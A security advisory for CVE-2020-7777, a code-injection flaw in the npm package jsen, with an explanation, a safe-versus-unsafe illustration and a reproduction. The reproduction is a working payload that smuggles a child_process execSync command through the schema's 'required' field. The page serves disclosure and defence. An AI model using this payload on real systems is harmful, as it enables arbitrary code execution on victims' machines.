Arbitrary Code Execution
Description
This affects all versions of package jsen. If an attacker can control the schema file, it could run arbitrary JavaScript code on the victim machine. In the module description and README file there is no mention of the risks of untrusted schema files, so I assume that this is applicable. In particular, the required field of the schema is not properly sanitized. The resulting string that is built based on the schema definition is then passed to a Function.apply();, leading to an Arbitrary Code Execution.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
| jsen (npm) | <= 0.6.6 | — |
Affected products
- jsen/jsen (description)
Patches
Vulnerability mechanics
Root cause
"The 'required' field in the schema is not properly sanitized, allowing for arbitrary code execution when processed."
Attack vector
An attacker can control the schema file used by the jsen package. By injecting malicious JavaScript code into the 'required' field of the schema, the attacker can cause arbitrary JavaScript code to be executed on the victim machine when the schema is processed. The module description and README do not warn about the risks of untrusted schema files, making this attack vector more plausible [ref_id=1]. The resulting string is then passed to Function.apply(), leading to code execution [ref_id=2].
Affected code
The vulnerability lies within the jsen package, specifically in how it handles the 'required' field within a schema definition. The code constructs a string based on this field, which is then passed to `Function.apply()`, enabling arbitrary code execution [ref_id=1]. The affected code path is referenced at `lib/jsen.js#L875` [ref_id=1].
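A simplified model of this bug class, added here as an illustration; it is not jsen's source and not code from the advisory. `compileUnsafe`, `compileSafe`, `demo`, `MARKER_NAME` and the `__probe` marker are hypothetical names, and the sample schema is constructed with a payload that only sets a harmless flag.

```javascript
// Simplified model of the bug class, NOT jsen's source. All names are hypothetical.

// Vulnerable: each required property name is pasted between double quotes
// in generated source text, so a name containing '"' ends the literal early.
function compileUnsafe(schema) {
  const checks = (schema.required || [])
    .map((name) => 'if (data["' + name + '"] === undefined) return false;')
    .join("\n");
  return new Function("data", checks + "\nreturn true;");
}

// Hardened: JSON.stringify emits a fully escaped string literal, so the
// name stays data no matter which characters it contains.
function compileSafe(schema) {
  const checks = (schema.required || [])
    .map((name) => {
      if (typeof name !== "string") {
        throw new TypeError("required entries must be strings");
      }
      return "if (data[" + JSON.stringify(name) + "] === undefined) return false;";
    })
    .join("\n");
  return new Function("data", checks + "\nreturn true;");
}

// Constructed sample: a "property name" that only sets a harmless marker.
const MARKER_NAME = '"+(globalThis.__probe="ran")+"';

function demo() {
  const schema = { type: "object", required: [MARKER_NAME] };

  delete globalThis.__probe;
  compileUnsafe(schema)({});
  const unsafeRan = globalThis.__probe === "ran";

  delete globalThis.__probe;
  const accepted = compileSafe(schema)({ [MARKER_NAME]: 1 });
  const safeRan = globalThis.__probe === "ran";

  return { unsafeRan, safeRan, accepted };
}

console.log(demo());
```

The hardened generator treats the same string as an ordinary, oddly named property, which is why it accepts an object that actually carries that key.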
What the fix does
The advisory states that there is no fixed version for jsen [ref_id=2]. Therefore, no patch is available to address this vulnerability. Users are advised to avoid using untrusted schema files with the jsen package.
Preconditions
- Input: The attacker must be able to control the schema file that is processed by the jsen package.
Reproduction
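```js
const jsen = require('jsen');

// The schema arrives as attacker-controlled JSON text. The template literal
// preserves the escaped quotes that JSON.parse needs inside "required".
let schema = JSON.parse(`{
  "type": "object",
  "properties": { "username": { "type": "string" } },
  "required": ["\\"+process.mainModule.require(\'child_process\').execSync(\'touch malicious\')+\\""]
}`);

// The injected expression is embedded in the generated validator code.
const validate = jsen(schema);
validate({});
```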
Generated on Jun 5, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
- github.com/advisories/GHSA-vm64-cfqx-3698 (ghsa, ADVISORY)
- nvd.nist.gov/vuln/detail/CVE-2020-7777 (ghsa, ADVISORY)
- github.com/bugventure/jsen/blob/master/lib/jsen.js (ghsa, WEB)
- github.com/bugventure/jsen/blob/master/lib/jsen.js%23L875 (mitre, x_refsource_MISC)
- security.snyk.io/vuln/SNYK-JS-JSEN-1014670 (ghsa, WEB)
- snyk.io/vuln/SNYK-JS-JSEN-1014670 (mitre, x_refsource_MISC)